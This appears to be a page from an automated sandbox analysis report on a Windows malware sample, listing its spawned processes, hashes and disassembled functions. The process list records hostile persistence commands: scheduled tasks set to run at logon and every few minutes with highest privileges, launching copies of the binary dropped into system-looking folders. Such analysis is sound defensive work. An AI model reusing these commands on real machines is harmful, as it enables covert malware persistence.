Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5941.tmp" "c:\Windows\System32\CSCC093A9EE2E0C4098883B2A265DAA859.TMP"
Imagebase:	0x7ff71b2f0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	21:31:57
Start date:	02/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 9 /tr "'C:\Program Files\Microsoft\lMBSkpoWMYaHkUMNHfb.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	21:31:57
Start date:	02/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfb" /sc ONLOGON /tr "'C:\Program Files\Microsoft\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	21:31:57
Start date:	02/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	21:31:57
Start date:	02/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows multimedia platform\lMBSkpoWMYaHkUMNHfb.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	21:31:57
Start date:	02/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfb" /sc ONLOGON /tr "'C:\Program Files (x86)\windows multimedia platform\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	21:31:57
Start date:	02/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\windows multimedia platform\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	21:31:57
Start date:	02/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 14 /tr "'C:\Users\user\Videos\lMBSkpoWMYaHkUMNHfb.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	21:31:57
Start date:	02/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfb" /sc ONLOGON /tr "'C:\Users\user\Videos\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	21:31:57
Start date:	02/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 5 /tr "'C:\Users\user\Videos\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	21:31:57
Start date:	02/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	21:31:57
Start date:	02/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfb" /sc ONLOGON /tr "'C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	21:31:57
Start date:	02/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	21:31:57
Start date:	02/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "k1iZHyRK6Kk" /sc MINUTE /mo 8 /tr "'C:\Users\user\Desktop\k1iZHyRK6K.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	21:31:57
Start date:	02/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "k1iZHyRK6K" /sc ONLOGON /tr "'C:\Users\user\Desktop\k1iZHyRK6K.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	21:31:57
Start date:	02/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "k1iZHyRK6Kk" /sc MINUTE /mo 13 /tr "'C:\Users\user\Desktop\k1iZHyRK6K.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	21:31:57
Start date:	02/11/2024
Path:	C:\Users\user\Desktop\k1iZHyRK6K.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\k1iZHyRK6K.exe
Imagebase:	0xf60000
File size:	875'520 bytes
MD5 hash:	5780DBAE6AC61A88C8D89F216F324146
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	21:31:58
Start date:	02/11/2024
Path:	C:\Users\user\Desktop\k1iZHyRK6K.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\k1iZHyRK6K.exe
Imagebase:	0x8c0000
File size:	875'520 bytes
MD5 hash:	5780DBAE6AC61A88C8D89F216F324146
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	21:31:58
Start date:	02/11/2024
Path:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"
Imagebase:	0x600000
File size:	875'520 bytes
MD5 hash:	5780DBAE6AC61A88C8D89F216F324146
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	21:31:58
Start date:	02/11/2024
Path:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"
Imagebase:	0x580000
File size:	875'520 bytes
MD5 hash:	5780DBAE6AC61A88C8D89F216F324146
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	21:32:01
Start date:	02/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\YzuQZSWjCd.bat"
Imagebase:	0x7ff7e0300000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	21:32:01
Start date:	02/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	21:32:01
Start date:	02/11/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff68ee60000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	21:32:01
Start date:	02/11/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7a94d0000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	21:32:08
Start date:	02/11/2024
Path:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"
Imagebase:	0x400000
File size:	875'520 bytes
MD5 hash:	5780DBAE6AC61A88C8D89F216F324146
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	21:32:09
Start date:	02/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"
Imagebase:	0x7ff7e0300000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	21:32:09
Start date:	02/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	21:32:09
Start date:	02/11/2024
Path:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"
Imagebase:	0x350000
File size:	875'520 bytes
MD5 hash:	5780DBAE6AC61A88C8D89F216F324146
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	21:32:10
Start date:	02/11/2024
Path:	C:\Users\user\Desktop\k1iZHyRK6K.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\k1iZHyRK6K.exe"
Imagebase:	0x8b0000
File size:	875'520 bytes
MD5 hash:	5780DBAE6AC61A88C8D89F216F324146
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	21:32:12
Start date:	02/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\JanKBv1Gj5.bat"
Imagebase:	0x7ff7e0300000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	21:32:12
Start date:	02/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	21:32:12
Start date:	02/11/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff68ee60000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	21:32:12
Start date:	02/11/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff663a30000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	21:32:16
Start date:	02/11/2024
Path:	C:\Users\user\Desktop\k1iZHyRK6K.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\k1iZHyRK6K.exe"
Imagebase:	0xac0000
File size:	875'520 bytes
MD5 hash:	5780DBAE6AC61A88C8D89F216F324146
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	21:32:18
Start date:	02/11/2024
Path:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"
Imagebase:	0x610000
File size:	875'520 bytes
MD5 hash:	5780DBAE6AC61A88C8D89F216F324146
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	21:32:24
Start date:	02/11/2024
Path:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"
Imagebase:	0xea0000
File size:	875'520 bytes
MD5 hash:	5780DBAE6AC61A88C8D89F216F324146
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	21:32:33
Start date:	02/11/2024
Path:	C:\Users\user\Desktop\k1iZHyRK6K.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\k1iZHyRK6K.exe"
Imagebase:	0x7ff7699e0000
File size:	875'520 bytes
MD5 hash:	5780DBAE6AC61A88C8D89F216F324146
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	13.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	11.4%
Total number of Nodes:	88
Total number of Limit Nodes:	5

Executed Functions

Function 00007FFD9B878E70 Relevance: 5.1, Strings: 3, Instructions: 1328
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U_H, xrefs: 00007FFD9B87C192
%, xrefs: 00007FFD9B87B563
@, xrefs: 00007FFD9B87B64C

Memory Dump Source

Source File: 00000000.00000002.1716721251.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID: %$@$U_H
API String ID: 0-843212952
Opcode ID: 8ce8e5013de092bbf63644a0a5e764c8b610b4052c42d02daa6814df301eb609
Instruction ID: 32455779aa8ecd0588050f6b0d774d66905d50211516c74403bfe563918bddf2
Opcode Fuzzy Hash: 8ce8e5013de092bbf63644a0a5e764c8b610b4052c42d02daa6814df301eb609
Instruction Fuzzy Hash: D092D431B1DA494FE7B8DB6884A57B973E2FF98314F14457DD08EC32A6DE34A8428742

Function 00007FFD9B87C350 Relevance: 2.2, Instructions: 2241
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1716721251.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bc7c8466427afcdc5158d42477d85854ea6d3b69a86096fd10af5f00fa7ddcf
Instruction ID: 8cde7c1fd1b8b8c049778a108c6c2f2987bd8e5506e59617147fb0688950ebab
Opcode Fuzzy Hash: 9bc7c8466427afcdc5158d42477d85854ea6d3b69a86096fd10af5f00fa7ddcf
Instruction Fuzzy Hash: AC03D175A0851C8FDB99DF58C499BA973F1FB58304F2081AED00EE7695CA769A82CF40

Function 00007FFD9B878B98 Relevance: 1.9, APIs: 1, Instructions: 406
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32 ref: 00007FFD9B87AF9F

Memory Dump Source

Source File: 00000000.00000002.1716721251.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_k1iZHyRK6K.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: ba30282db23085483a78dc1b360d02dca2d9d8ee44f1b878d2480222bb82493a
Instruction ID: ac31b8dab196b5f129a0f7e7256cf3efc33b07ce61e88df01274655dd0b3766e
Opcode Fuzzy Hash: ba30282db23085483a78dc1b360d02dca2d9d8ee44f1b878d2480222bb82493a
Instruction Fuzzy Hash: C7B13832B0DE0D5FE768D75C9895AB93BD2EB99325F05427ED04DC32B1DE34A9028781

Function 00007FFD9B9E195A Relevance: .6, Instructions: 551COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717527837.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b9e0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 963b5aa575203d1ab719f656d0a083c793e6a16ccbb445c78f50324389b029d5
Instruction ID: 159c8fc746e5a072277aa67e36ad449fc801c8e15af4cb5ad19ca18661cfc321
Opcode Fuzzy Hash: 963b5aa575203d1ab719f656d0a083c793e6a16ccbb445c78f50324389b029d5
Instruction Fuzzy Hash: 1C22C230E1965DAFDB6DCF98C4A4AB87BB1FF59304F1040BED45AC7296CA34AA41CB41

Function 00007FFD9B8793A1 Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1716721251.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 181fca2789601fe34f1097a26f9cb4fac811516d4c0a2945b8cd5e4f33b84f2c
Instruction ID: 63b4f3be7d7874ea12e95e387d7b43ef7889c818e76d7c959067e0b66a765f66
Opcode Fuzzy Hash: 181fca2789601fe34f1097a26f9cb4fac811516d4c0a2945b8cd5e4f33b84f2c
Instruction Fuzzy Hash: 29F19C21B1E78E5BE7699B6888F86B57BD1EF59304F0505BED09EC31E7DD28B8028341

Function 00007FFD9B87C425 Relevance: .5, Instructions: 469COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1716721251.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b06e7f904fceccba3543391e27abfb5cac06bca999339a5607442939a25a91f
Instruction ID: fcd27dbff9605d1ac482f56463fc940a80f554040d3db2962229b2116f6a2853
Opcode Fuzzy Hash: 6b06e7f904fceccba3543391e27abfb5cac06bca999339a5607442939a25a91f
Instruction Fuzzy Hash: BBE17771E0D6594AE37C8B58D4613B577E0EBD9321F29837FD0DF836D2CA2869068741

Function 00007FFD9B9F0B12 Relevance: .5, Instructions: 457COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717527837.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b9e0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1748d5421b9018b703e57e7fc21650b93a83e0db484c4205ec47eead837961f
Instruction ID: a89b4543b08573f287911048e2eba3c0e31d18aa8f9e42b4e580cbcf3a820fbf
Opcode Fuzzy Hash: b1748d5421b9018b703e57e7fc21650b93a83e0db484c4205ec47eead837961f
Instruction Fuzzy Hash: 74E1D330B19A4E8FEBA8DF28C8657E97BD1FF54310F14426AD84DC72A1DA34A9408B81

Function 00007FFD9B878028 Relevance: .4, Instructions: 431COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1716721251.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51d93236ea402deb2ad212eb04f3eae69b7d5ffaab80a50966dad35aa071aa93
Instruction ID: 44c7fb83fc1778607b777b830a43f17022e28a0d8398087d484a92e0a798e5d1
Opcode Fuzzy Hash: 51d93236ea402deb2ad212eb04f3eae69b7d5ffaab80a50966dad35aa071aa93
Instruction Fuzzy Hash: 43D11931F2DA4D0BEB58EB6C98A5579B7E2FF98308F51457ED01DC31D6DE28A9028341

Function 00007FFD9B871222 Relevance: .4, Instructions: 391COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1716721251.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a4801166c24738f1b6579844ee58d26f1545278dc9203c3e528dd6371e5eee5
Instruction ID: caa4d6684acefa539a2886c79b54420fd3ea894286e85da589b95cf0c8d2e072
Opcode Fuzzy Hash: 4a4801166c24738f1b6579844ee58d26f1545278dc9203c3e528dd6371e5eee5
Instruction Fuzzy Hash: 8CC18D20B1E68E0FE369AB7884A56B537E2EF4A314F1540FAD48EC75E7DD1CA8429341

Function 00007FFD9B878E7F Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1716721251.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ee6130e601ef32ec1717fc387c79e23ea8eaf0aaa35c5eda72f247ef27344a5
Instruction ID: 309929191dee8b68535d1191cd2d6cd47bc62b8c56ed6344d2efd602012c7aa9
Opcode Fuzzy Hash: 5ee6130e601ef32ec1717fc387c79e23ea8eaf0aaa35c5eda72f247ef27344a5
Instruction Fuzzy Hash: 13A10772B2DA4D0BEB64EF2C48A557977E2FF98308F15457ED05DC32D6DE24A9028381

Function 00007FFD9B8D5CE0 Relevance: 1.8, APIs: 1, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1716721251.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d459e145c803559a9aa5619d81aa4b2037bca9b4da2e20c0e47703037c4b4c33
Instruction ID: 2b58b0e9855b759159118a60d5d6234b3d38cb32860db7092784b1979be3fa1c
Opcode Fuzzy Hash: d459e145c803559a9aa5619d81aa4b2037bca9b4da2e20c0e47703037c4b4c33
Instruction Fuzzy Hash: 9F91E431B0DA4D4FEB6C9B5C98656B977D1EBD9310F14037FE04AC32E6DE25A8068381

Function 00007FFD9B9E976D Relevance: 1.8, APIs: 1, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryFullProcessImageNameA.KERNEL32 ref: 00007FFD9B9E9921

Memory Dump Source

Source File: 00000000.00000002.1717527837.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b9e0000_k1iZHyRK6K.jbxd

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: 1edffa00865c23b740a9eb3b505bece56f6bea1261e49b8c9c2c3f6f1da5a882
Instruction ID: 5bcfc9a64d6326aa7d1d3b0a54b8010e4f14950285f2ff02da94211dbf6d8904
Opcode Fuzzy Hash: 1edffa00865c23b740a9eb3b505bece56f6bea1261e49b8c9c2c3f6f1da5a882
